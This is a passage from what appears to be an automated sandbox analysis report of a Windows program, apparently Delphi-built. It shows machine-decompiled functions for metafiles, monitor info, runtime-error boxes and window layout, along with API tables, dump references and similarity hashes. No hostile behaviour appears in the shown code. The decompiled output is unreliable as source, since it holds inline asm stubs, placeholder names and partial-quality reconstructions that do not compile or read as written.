				_v54.mm = 8;
				_v54.xExt = 0;
				_v54.yExt = 0;
				_v54.hMF = 0;
				_t119 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t119;
				if(_t119 == 0) {
					E00420A20();
				}
				GetEnhMetaFileHeader( *(_t103 + 8), 0x64,  &_v154);
				_v54.mm = 8;
				_v54.xExt = _v122;
				_v54.yExt = _v118;
				_v54.hMF = 0;
				DeleteEnhMetaFile( *(_t103 + 8));
				_t120 = SetWinMetaFileBits(_v12, _v16, 0,  &_v54);
				 *(_t103 + 8) = _t120;
				if(_t120 == 0) {
					E00420A20();
				}
				 *((char*)(_t122 + 0x2c)) = 0;
				_pop(_t115);
				 *[fs:eax] = _t115;
				_push(E00422E62);
				return E00402774(_v16);
			}


























                                                                        0x00422ced
                                                                        0x00422cef
                                                                        0x00422cf8
                                                                        0x00422cfb
                                                                        0x00422cfe
                                                                        0x00422d02
                                                                        0x00422d14
                                                                        0x00422d1e
                                                                        0x00422d2e
                                                                        0x00422d2e
                                                                        0x00422d33
                                                                        0x00422d3f
                                                                        0x00422d42
                                                                        0x00422d50
                                                                        0x00422d5e
                                                                        0x00422d68
                                                                        0x00422d71
                                                                        0x00422d73
                                                                        0x00422d73
                                                                        0x00422d93
                                                                        0x00422db0
                                                                        0x00422db3
                                                                        0x00422dbc
                                                                        0x00422dc1
                                                                        0x00422dc6
                                                                        0x00422ddc
                                                                        0x00422dde
                                                                        0x00422de3
                                                                        0x00422de5
                                                                        0x00422de5
                                                                        0x00422df7
                                                                        0x00422dfc
                                                                        0x00422e06
                                                                        0x00422e0c
                                                                        0x00422e11
                                                                        0x00422e18
                                                                        0x00422e30
                                                                        0x00422e32
                                                                        0x00422e37
                                                                        0x00422e39
                                                                        0x00422e39
                                                                        0x00422e3e
                                                                        0x00422e44
                                                                        0x00422e47
                                                                        0x00422e4a
                                                                        0x00422e5a

                                                                        APIs
                                                                        • MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422D8E
                                                                        • MulDiv.KERNEL32(?,000009EC,00000000), ref: 00422DAB
                                                                        • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422DD7
                                                                        • GetEnhMetaFileHeader.GDI32(00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC,00000000), ref: 00422DF7
                                                                        • DeleteEnhMetaFile.GDI32(00000016), ref: 00422E18
                                                                        • SetWinMetaFileBits.GDI32(00000016,?,00000000,00000008,00000016,00000064,?,00000016,?,00000000,00000008,?,000009EC,00000000,?,000009EC), ref: 00422E2B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FileMeta$Bits$DeleteHeader
                                                                        • String ID: `
                                                                        • API String ID: 1990453761-2679148245
                                                                        • Opcode ID: ec978911b333c8a9dc1ac6c849a624436fee95648c6e243f4a88b920bed035bd
                                                                        • Instruction ID: 01aed2916d9461752607c608983ec61ef17ba308f3f8825e499b2a2baebaa4d3
                                                                        • Opcode Fuzzy Hash: ec978911b333c8a9dc1ac6c849a624436fee95648c6e243f4a88b920bed035bd
                                                                        • Instruction Fuzzy Hash: DF412E75E00218AFDB00DFA9D985AAEB7F9EF48710F51846AF404FB241D7789D40CB68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00427548, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 68stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 67%
                                                                        			E00427548(struct HMONITOR__* _a4, struct tagMONITORINFO* _a8) {
				void _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t23;
				int _t24;
				struct HMONITOR__* _t27;
				struct tagMONITORINFO* _t29;
				intOrPtr* _t31;

				_t29 = _a8;
				_t27 = _a4;
				if( *0x496ac8 != 0) {
					_t24 = 0;
					if(_t27 == 0x12340042 && _t29 != 0 && _t29->cbSize >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
						_t29->rcMonitor.left = 0;
						_t29->rcMonitor.top = 0;
						_t29->rcMonitor.right = GetSystemMetrics(0);
						_t29->rcMonitor.bottom = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t31 = _t29;
						 *(_t31 + 0x24) = 1;
						if( *_t31 >= 0x4c) {
							_push("DISPLAY");
							_push(_t31 + 0x28);
							L00406A9C();
						}
						_t24 = 1;
					}
				} else {
					 *0x496aac = E00427218(4, _t23,  *0x496aac, _t27, _t29);
					_t24 = GetMonitorInfoA(_t27, _t29);
				}
				return _t24;
			}













                                                                        0x00427551
                                                                        0x00427554
                                                                        0x0042755e
                                                                        0x00427583
                                                                        0x0042758b
                                                                        0x004275ab
                                                                        0x004275b0
                                                                        0x004275bb
                                                                        0x004275c6
                                                                        0x004275d0
                                                                        0x004275d1
                                                                        0x004275d2
                                                                        0x004275d3
                                                                        0x004275d4
                                                                        0x004275d5
                                                                        0x004275df
                                                                        0x004275e1
                                                                        0x004275e9
                                                                        0x004275ea
                                                                        0x004275ea
                                                                        0x004275ef
                                                                        0x004275ef
                                                                        0x00427560
                                                                        0x00427572
                                                                        0x0042757f
                                                                        0x0042757f
                                                                        0x004275f9

                                                                        APIs
                                                                        • GetMonitorInfoA.USER32(?,?), ref: 00427579
                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004275A0
                                                                        • GetSystemMetrics.USER32 ref: 004275B5
                                                                        • GetSystemMetrics.USER32 ref: 004275C0
                                                                        • lstrcpy.KERNEL32(?,DISPLAY), ref: 004275EA
                                                                          • Part of subcall function 00427218: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427298
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: System$InfoMetrics$AddressMonitorParametersProclstrcpy
                                                                        • String ID: DISPLAY$GetMonitorInfo
                                                                        • API String ID: 1539801207-1633989206
                                                                        • Opcode ID: 1644f9ef54712b8acc15ff1c2dbde6ccff60e967c01c1c93aa83ca6663675b5d
                                                                        • Instruction ID: 6783ea58f697a8443343b13a6c264d2348319dbac4baab090155d0615a0f433e
                                                                        • Opcode Fuzzy Hash: 1644f9ef54712b8acc15ff1c2dbde6ccff60e967c01c1c93aa83ca6663675b5d
                                                                        • Instruction Fuzzy Hash: 0A1106727047116FD720CF65AC447A7F7A9EB17320F50853BFC06A7A40D7B9A8408BA9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040A0C8, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50filewindowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040A0C8(void* __edi) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t10;
				char* _t12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t22;
				long _t26;
				void* _t34;

				E00409F40(_t10,  &_v1024, _t34, 0x400);
				_t12 =  *0x495b34; // 0x496048
				if( *_t12 == 0) {
					_t14 =  *0x495914; // 0x40759c
					_t7 = _t14 + 4; // 0xffe8
					_t16 =  *0x496714; // 0x400000
					LoadStringA(E00405AAC(_t16),  *_t7,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t22 =  *0x49595c; // 0x496218
				E00402D34(_t22);
				_t26 = E00408BF8( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff5),  &_v1024, _t26,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff5), 0x40a178, 2,  &_v1092, 0);
			}













                                                                        0x0040a0d7
                                                                        0x0040a0dc
                                                                        0x0040a0e4
                                                                        0x0040a137
                                                                        0x0040a13c
                                                                        0x0040a140
                                                                        0x0040a14b
                                                                        0x00000000
                                                                        0x0040a161
                                                                        0x0040a0e6
                                                                        0x0040a0eb
                                                                        0x0040a0fb
                                                                        0x0040a10e
                                                                        0x00000000

                                                                        APIs
                                                                          • Part of subcall function 00409F40: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409F5D
                                                                          • Part of subcall function 00409F40: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409F81
                                                                          • Part of subcall function 00409F40: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409F9C
                                                                          • Part of subcall function 00409F40: LoadStringA.USER32 ref: 0040A032
                                                                        • GetStdHandle.KERNEL32(000000F5,?,00000000,?,00000000), ref: 0040A108
                                                                        • WriteFile.KERNEL32(00000000,000000F5,?,00000000,?,00000000), ref: 0040A10E
                                                                        • GetStdHandle.KERNEL32(000000F5,0040A178,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 0040A123
                                                                        • WriteFile.KERNEL32(00000000,000000F5,0040A178,00000002,?,00000000,00000000,000000F5,?,00000000,?,00000000), ref: 0040A129
                                                                        • LoadStringA.USER32 ref: 0040A14B
                                                                        • MessageBoxA.USER32 ref: 0040A161
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: File$HandleLoadModuleNameStringWrite$MessageQueryVirtual
                                                                        • String ID: H`I
                                                                        • API String ID: 1802973324-3946158073
                                                                        • Opcode ID: 46a409c553fa7b0eaac4b9152b14505e0718eae20c8bb15c3c42cbfd28e4cb2f
                                                                        • Instruction ID: 164a82ec87427e02c43d68d6289cc30817225284fd7a8bc5127b03f5bcef9bb4
                                                                        • Opcode Fuzzy Hash: 46a409c553fa7b0eaac4b9152b14505e0718eae20c8bb15c3c42cbfd28e4cb2f
                                                                        • Instruction Fuzzy Hash: 46016DB1614300AAE200F7A4CC46F9B77EC9B45718F50463BB755FA0E2DA78E9148B3B
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004041CC, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 79%
                                                                        			E004041CC(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x496048 == 0) {
					if( *0x47a01c == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x49621c == 0xd7b2 &&  *0x496224 > 0) {
						 *0x496234();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00404254, 2,  &_v4, 0);
				}
			}





                                                                        0x004041d4
                                                                        0x00404234
                                                                        0x00404244
                                                                        0x00404244
                                                                        0x0040424a
                                                                        0x004041d6
                                                                        0x004041df
                                                                        0x004041ef
                                                                        0x004041ef
                                                                        0x0040420b
                                                                        0x0040422c
                                                                        0x0040422c

                                                                        APIs
                                                                        • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,004798C4,00000000,?,0040429A,?,?,?,00000001,0040433A,00402863,004028AB,?,00000000), ref: 00404205
                                                                        • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,004798C4,00000000,?,0040429A,?,?,?,00000001,0040433A,00402863,004028AB), ref: 0040420B
                                                                        • GetStdHandle.KERNEL32(000000F5,00404254,00000002,004798C4,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,004798C4,00000000,?,0040429A), ref: 00404220
                                                                        • WriteFile.KERNEL32(00000000,000000F5,00404254,00000002,004798C4,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,004798C4,00000000,?,0040429A), ref: 00404226
                                                                        • MessageBoxA.USER32 ref: 00404244
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FileHandleWrite$Message
                                                                        • String ID: Error$Runtime error at 00000000
                                                                        • API String ID: 1570097196-2970929446
                                                                        • Opcode ID: 4761f131ddf98c97f3b1034989d57503ea3da9a4de15842b6ca85224d8e130d7
                                                                        • Instruction ID: 196c44c3e04e492743d3cd85247e7e05a160b8e68fe7c0a1ee4f43ec710e7497
                                                                        • Opcode Fuzzy Hash: 4761f131ddf98c97f3b1034989d57503ea3da9a4de15842b6ca85224d8e130d7
                                                                        • Instruction Fuzzy Hash: FEF0BBA078438075FA2077649D07F9E224C47D1F19F604AFFB314B40E286BC44C4572E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0042EE4C, Relevance: 12.1, APIs: 8, Instructions: 146COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 73%
                                                                        			E0042EE4C(void* __eax, void* __ecx, void* __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				struct HDWP__* _v28;
				int _v32;
				char _v36;
				struct tagTEXTMETRICA _v92;
				void* __ebx;
				void* __ebp;
				intOrPtr _t85;
				void* _t89;
				void* _t113;
				char _t117;
				intOrPtr* _t119;
				void* _t144;
				void* _t146;
				signed int _t147;
				long _t148;
				signed int _t158;
				intOrPtr _t160;
				struct HDC__* _t175;
				int _t176;
				void* _t179;
				void* _t181;
				intOrPtr _t182;
				intOrPtr _t188;

				_t146 = __ecx;
				_t179 = _t181;
				_t182 = _t181 + 0xffffffa8;
				_t144 = __eax;
				_t85 =  *((intOrPtr*)(__eax + 0x210));
				if( *((intOrPtr*)(_t85 + 8)) == 0 ||  *((char*)(__eax + 0x220)) != 0) {
					return _t85;
				} else {
					_t175 = GetDC(0);
					_t89 = SelectObject(_t175, E0041F478( *((intOrPtr*)(_t144 + 0x68)), _t144, _t146));
					GetTextMetricsA(_t175,  &_v92);
					SelectObject(_t175, _t89);
					ReleaseDC(0, _t175);
					_t176 =  *( *((intOrPtr*)(_t144 + 0x210)) + 8);
					_t147 =  *(_t144 + 0x21c);
					asm("cdq");
					_v8 = (_t176 + _t147 - 1) / _t147;
					asm("cdq");
					_v12 = ( *((intOrPtr*)(_t144 + 0x48)) - 0xa) / _t147;
					_t148 = _v92.tmHeight;
					_v24 =  *((intOrPtr*)(_t144 + 0x4c)) - _t148 - 5;
					asm("cdq");
					_v16 = _v24 / _v8;
					asm("cdq");
					_t34 = _v24 % _v8;
					_t158 = _t34 >> 1;
					if(_t34 < 0) {
						asm("adc edx, 0x0");
					}
					_v20 = _t158 + _t148 + 1;
					_v28 = BeginDeferWindowPos(_t176);
					_push(_t179);
					_push(0x42efd5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t182;
					_t113 =  *( *((intOrPtr*)(_t144 + 0x210)) + 8) - 1;
					if(_t113 >= 0) {
						_t117 = _t113 + 1;
						_t188 = _t117;
						_v36 = _t117;
						_v24 = 0;
						do {
							_t119 = E00414208( *((intOrPtr*)(_t144 + 0x210)), _v24);
							_t172 = _t119;
							 *((intOrPtr*)( *_t119 + 0x70))();
							asm("cdq");
							_v32 = _v24 / _v8 * _v12 + 8;
							if(E004037D8(_t119, _t188) != 0) {
								_v32 = E00435FB0(_t144) - _v32 - _v12;
							}
							asm("cdq");
							_v28 = DeferWindowPos(_v28, E0043CC2C(_t172), 0, _v32, _v24 % _v8 * _v16 + _v20, _v12, _v16, 0x14);
							E004364CC(_t172, 1);
							_v24 = _v24 + 1;
							_t81 =  &_v36;
							 *_t81 = _v36 - 1;
						} while ( *_t81 != 0);
					}
					_pop(_t160);
					 *[fs:eax] = _t160;
					_push(0x42efdc);
					return EndDeferWindowPos(_v28);
				}
			}































                                                                        0x0042ee4c
                                                                        0x0042ee4d
                                                                        0x0042ee4f
                                                                        0x0042ee55
                                                                        0x0042ee57
                                                                        0x0042ee61
                                                                        0x0042efe2
                                                                        0x0042ee74
                                                                        0x0042ee7b
                                                                        0x0042ee87
                                                                        0x0042ee93
                                                                        0x0042ee9a
                                                                        0x0042eea2
                                                                        0x0042eead
                                                                        0x0042eeb2
                                                                        0x0042eebb
                                                                        0x0042eebe
                                                                        0x0042eec7
                                                                        0x0042eeca
                                                                        0x0042eed0
                                                                        0x0042eed8
                                                                        0x0042eede
                                                                        0x0042eee2
                                                                        0x0042eee8
                                                                        0x0042eee9
                                                                        0x0042eeec
                                                                        0x0042eeee
                                                                        0x0042eef0
                                                                        0x0042eef0
                                                                        0x0042eef6
                                                                        0x0042eeff
                                                                        0x0042ef04
                                                                        0x0042ef05
                                                                        0x0042ef0a
                                                                        0x0042ef0d
                                                                        0x0042ef19
                                                                        0x0042ef1c
                                                                        0x0042ef22
                                                                        0x0042ef22
                                                                        0x0042ef23
                                                                        0x0042ef26
                                                                        0x0042ef2d
                                                                        0x0042ef36
                                                                        0x0042ef3b
                                                                        0x0042ef44
                                                                        0x0042ef4a
                                                                        0x0042ef54
                                                                        0x0042ef64
                                                                        0x0042ef73
                                                                        0x0042ef73
                                                                        0x0042ef83
                                                                        0x0042efa6
                                                                        0x0042efad
                                                                        0x0042efb2
                                                                        0x0042efb5
                                                                        0x0042efb5
                                                                        0x0042efb5
                                                                        0x0042ef2d
                                                                        0x0042efc0
                                                                        0x0042efc3
                                                                        0x0042efc6
                                                                        0x0042efd4
                                                                        0x0042efd4

                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 0042EE76
                                                                          • Part of subcall function 0041F478: CreateFontIndirectA.GDI32(?), ref: 0041F5B6
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0042EE87
                                                                        • GetTextMetricsA.GDI32(00000000,?), ref: 0042EE93
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0042EE9A
                                                                        • ReleaseDC.USER32 ref: 0042EEA2
                                                                        • BeginDeferWindowPos.USER32 ref: 0042EEFA
                                                                        • DeferWindowPos.USER32(?,00000000,00000000,?,?,?,00000000,?), ref: 0042EFA1
                                                                        • EndDeferWindowPos.USER32(?,0042EFDC,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042EFCF
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: DeferWindow$ObjectSelect$BeginCreateFontIndirectMetricsReleaseText
                                                                        • String ID:
                                                                        • API String ID: 1262541054-0
                                                                        • Opcode ID: 218aff618e0d1c92c010e9e46c08f2c33b00da450782674677ceb1564e956cea
                                                                        • Instruction ID: f4d01097e73c3804610282b1e03a132fba9f815ae9591d249fd19601606493d4
                                                                        • Opcode Fuzzy Hash: 218aff618e0d1c92c010e9e46c08f2c33b00da450782674677ceb1564e956cea
                                                                        • Instruction Fuzzy Hash: B6414271A00119AFDB00DFA9C985AEEBBF5EF48304F154066F904E7391D7389D41CB64
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0045325C, Relevance: 12.1, APIs: 8, Instructions: 138windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 74%
                                                                        			E0045325C(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v22;
				intOrPtr _v28;
				struct HWND__* _v32;
				char _v36;
				intOrPtr _t50;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t63;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t68;
				intOrPtr _t83;
				void* _t88;
				intOrPtr _t120;
				void* _t122;
				void* _t125;
				void* _t126;
				intOrPtr _t127;

				_t123 = __esi;
				_t122 = __edi;
				_t125 = _t126;
				_t127 = _t126 + 0xffffffe0;
				_push(__ebx);
				_push(__esi);
				_v36 = 0;
				_v8 = __eax;
				_push(_t125);
				_push(0x4534ec);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				E00434E0C();
				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2ec) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
					_t50 =  *0x495a24; // 0x41d59c
					E00406548(_t50,  &_v36);
					E0040A17C(_v36, 1);
					E00403DA8();
				}
				if(GetCapture() != 0) {
					SendMessageA(GetCapture(), 0x1f, 0, 0);
				}
				ReleaseCapture();
				 *(_v8 + 0x2ec) =  *(_v8 + 0x2ec) | 0x00000008;
				_v32 = GetActiveWindow();
				_t58 =  *0x47aaf8; // 0x0
				_v20 = _t58;
				_t59 =  *0x496c08; // 0x217094c
				_t60 =  *0x496c08; // 0x217094c
				E00414284( *((intOrPtr*)(_t60 + 0x7c)),  *((intOrPtr*)(_t59 + 0x78)), 0);
				_t63 =  *0x496c08; // 0x217094c
				 *((intOrPtr*)(_t63 + 0x78)) = _v8;
				_t64 =  *0x496c08; // 0x217094c
				_v22 =  *((intOrPtr*)(_t64 + 0x44));
				_t66 =  *0x496c08; // 0x217094c
				E004546C4(_t66,  *((intOrPtr*)(_t59 + 0x78)), 0);
				_t68 =  *0x496c08; // 0x217094c
				_v28 =  *((intOrPtr*)(_t68 + 0x48));
				_v16 = E0044D650(0, 0x496c04, _t122, _t123);
				_push(_t125);
				_push(0x4534cc);
				_push( *[fs:edx]);
				 *[fs:edx] = _t127;
				E004531AC(_v8);
				_push(_t125);
				_push(0x45342b);
				_push( *[fs:edx]);
				 *[fs:edx] = _t127;
				SendMessageA(E0043CC2C(_v8), 0xb000, 0, 0);
				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
				do {
					E004563FC( *0x496c04, _t122, _t123);
					if( *((char*)( *0x496c04 + 0x9c)) == 0) {
						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
							E0045310C(_v8);
						}
					} else {
						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
					}
					_t83 =  *((intOrPtr*)(_v8 + 0x24c));
				} while (_t83 == 0);
				_v12 = _t83;
				SendMessageA(E0043CC2C(_v8), 0xb001, 0, 0);
				_t88 = E0043CC2C(_v8);
				if(_t88 != GetActiveWindow()) {
					_v32 = 0;
				}
				_pop(_t120);
				 *[fs:eax] = _t120;
				_push(0x453432);
				return E004531A4();
			}


























                                                                        0x0045325c
                                                                        0x0045325c
                                                                        0x0045325d
                                                                        0x0045325f
                                                                        0x00453262
                                                                        0x00453263
                                                                        0x00453266
                                                                        0x00453269
                                                                        0x00453273
                                                                        0x00453274
                                                                        0x00453279
                                                                        0x0045327c
                                                                        0x0045327f
                                                                        0x0045328b
                                                                        0x004532b4
                                                                        0x004532b9
                                                                        0x004532c8
                                                                        0x004532cd
                                                                        0x004532cd
                                                                        0x004532d9
                                                                        0x004532e7
                                                                        0x004532e7
                                                                        0x004532ec
                                                                        0x004532f4
                                                                        0x00453300
                                                                        0x00453303
                                                                        0x00453308
                                                                        0x0045330b
                                                                        0x00453313
                                                                        0x0045331d
                                                                        0x00453322
                                                                        0x0045332a
                                                                        0x0045332d
                                                                        0x00453336
                                                                        0x0045333c
                                                                        0x00453341
                                                                        0x00453346
                                                                        0x0045334e
                                                                        0x00453358
                                                                        0x0045335d
                                                                        0x0045335e
                                                                        0x00453363
                                                                        0x00453366
                                                                        0x0045336c
                                                                        0x00453373
                                                                        0x00453374
                                                                        0x00453379
                                                                        0x0045337c
                                                                        0x00453391
                                                                        0x0045339b
                                                                        0x004533a1
                                                                        0x004533a3
                                                                        0x004533b1
                                                                        0x004533cc
                                                                        0x004533d1
                                                                        0x004533d1
                                                                        0x004533b3
                                                                        0x004533b6
                                                                        0x004533b6
                                                                        0x004533d9
                                                                        0x004533df
                                                                        0x004533e3
                                                                        0x004533f8
                                                                        0x00453400
                                                                        0x0045340e
                                                                        0x00453412
                                                                        0x00453412
                                                                        0x00453417
                                                                        0x0045341a
                                                                        0x0045341d
                                                                        0x0045342a

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                        • String ID:
                                                                        • API String ID: 862346643-0
                                                                        • Opcode ID: d23c847d7f57aea184321512c31775f2395633f8dc318a8c35cf2f43c479741c
                                                                        • Instruction ID: 1e7db2e0920272a233e48265ae69c26bb7b820731f5faa072b4b138cd3cd441e
                                                                        • Opcode Fuzzy Hash: d23c847d7f57aea184321512c31775f2395633f8dc318a8c35cf2f43c479741c
                                                                        • Instruction Fuzzy Hash: A8512E30A006449FDB00EF6AC946B9E77F5EF49745F1140BAF804AB3A2D778AE44DB48
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0043AD08, Relevance: 12.1, APIs: 8, Instructions: 123COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0043AD08(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
				int _v8;
				int _v12;
				int _v16;
				char _v20;
				struct tagRECT _v36;
				signed int _t54;
				intOrPtr _t59;
				int _t61;
				void* _t63;
				void* _t66;
				void* _t82;
				int _t98;
				struct HDC__* _t99;

				_t99 = __edx;
				_t82 = __eax;
				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
				_v16 = SaveDC(__edx);
				E00434EE8(__edx, _a4, __ecx);
				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
				_t98 = 0;
				_v12 = 0;
				if((GetWindowLongA(E0043CC2C(_t82), 0xffffffec) & 0x00000002) == 0) {
					_t54 = GetWindowLongA(E0043CC2C(_t82), 0xfffffff0);
					__eflags = _t54 & 0x00800000;
					if((_t54 & 0x00800000) != 0) {
						_v12 = 3;
						_t98 = 0xa00f;
					}
				} else {
					_v12 = 0xa;
					_t98 = 0x200f;
				}
				if(_t98 != 0) {
					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
					DrawEdge(_t99,  &_v36, _v12, _t98);
					E00434EE8(_t99, _v36.top, _v36.left);
					IntersectClipRect(_t99, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
				}
